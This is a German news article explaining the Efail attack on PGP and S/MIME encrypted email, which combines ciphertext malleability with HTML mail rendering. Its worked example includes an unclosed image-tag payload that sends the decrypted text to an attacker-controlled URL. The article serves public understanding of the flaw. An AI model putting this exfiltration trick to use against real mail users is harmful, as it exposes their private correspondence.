Ein Team von IT-Sicherheitsforschern aus Bochum und Münster hat verschiedene Sicherheitsprobleme in Verschlüsselungstechnologien für E-Mails entdeckt. Getauft haben sie ihren Angriff Efail. Dabei nutzen sie eine Schwäche von alten, aber immer noch verwendeten Verschlüsselungstechnologien namens OpenPGP und S/MIME und kombinieren sie mit den Möglichkeiten von modernen Mailprogrammen, die Mails mit Bildern und anderen Inhalten anzeigen können – sogenannte HTML-Mails.

Bislang stand die Mailverschlüsselung vor allem deshalb in der Kritik, weil sie vergleichsweise schwer zu benutzen und einzurichten ist. In der Praxis nutzt daher auch nur eine kleine Minderheit der Anwender und Anwenderinnen verschlüsselte E-Mails. Für die meisten Anwender hat der Angriff daher auch wenig Praxisrelevanz – normale, also unverschlüsselte E-Mails sind genauso unsicher wie sie vorher schon waren. Ebenso nicht betroffen von dem Angriff ist die sogenannte Transportverschlüsselung mit TLS. Sie schützt aber nur den Weg zwischen einem Anwender und dessen Mailanbieter.

Anders die Verschlüsselung mit PGP oder S/MIME: Wenn Anwender sie korrekt nutzen, bietet sie ein hohes Maß an Sicherheit, dachte man jedenfalls. Diese Ansicht erhält nun einige Kratzer, auch wenn die Forscher die Verschlüsselung selbst nicht direkt angreifen. Mit einem Trick aber können Angreifer sich die Inhalte der Nachrichten nach der Entschlüsselung zuschicken lassen.

Die Verschlüsselung wird umgangen

Wie ist das möglich? Beide Techniken nutzen Verschlüsselungsmodi, die keine Echtheit der Daten garantieren. Das bedeutet, dass ein Angreifer zwar Mails nicht direkt mitlesen kann, er kann aber deren Inhalte manipulieren. Die Details sind etwas komplexer, aber vereinfacht gesagt: Wenn ein Angreifer Zugriff auf eine verschlüsselte Mail hat, etwa indem er sie mit einem Man-in-the-Middle-Angriff abgreift, kann er eine auf ihr basierende zweite verschlüsselte Mail erzeugen. Die hat teilweise einen anderen, von ihm kontrollierten Inhalt.

Diese Eigenschaft nutzt Efail aus. Moderne Mailprogramme und auch Webmailer ermöglichen es, E-Mails in mehreren Teilen umfangreich zu gestalten. So können Bilder oder Schriftarten eingebunden und alle Gestaltungsmöglichkeiten des HTML-Standards genutzt werden, der auch die Basis von Websites darstellt. Der Trick, der bei Efail zum Einsatz kommt: Eine Mail wird so umgeschrieben, dass sie ein Bild vom Server des Angreifers lädt und dabei den unverschlüsselten Inhalt der ursprünglichen Mail mitschickt.

Ein Beispiel: Die Angreiferin schickt als ersten Teil einer Nachricht einen HTML-Teil, der beispielsweise ein Bild lädt, aber den HTML-Tag nicht schließt. Also etwa <img src="http://efail.de/. Als zweiten Teil hängt sie den verschlüsselten Teil einer Mail an, die sie mitgelesen hat. Im Mailclient des Opfers passiert nun Folgendes: Erstens wird der verschlüsselte Teil entschlüsselt. Zweitens wird in diesem Fall ein Bild vom Server der Angreiferin geladen. Als Pfad wird der Inhalt des entschlüsselten Textteils codiert angehängt, etwa: http://efail.de/GEHEIMER_TEXT

Ein Angreifer entschlüsselt die Mail also nicht selbst, er lässt aber den Empfänger der Mail die Nachricht entschlüsseln und anschließend im Klartext an einen Server unter seiner Kontrolle schicken. Das hat auch die Konsequenz, dass selbst in der Vergangenheit verschickte verschlüsselte Nachrichten gefährdet sind.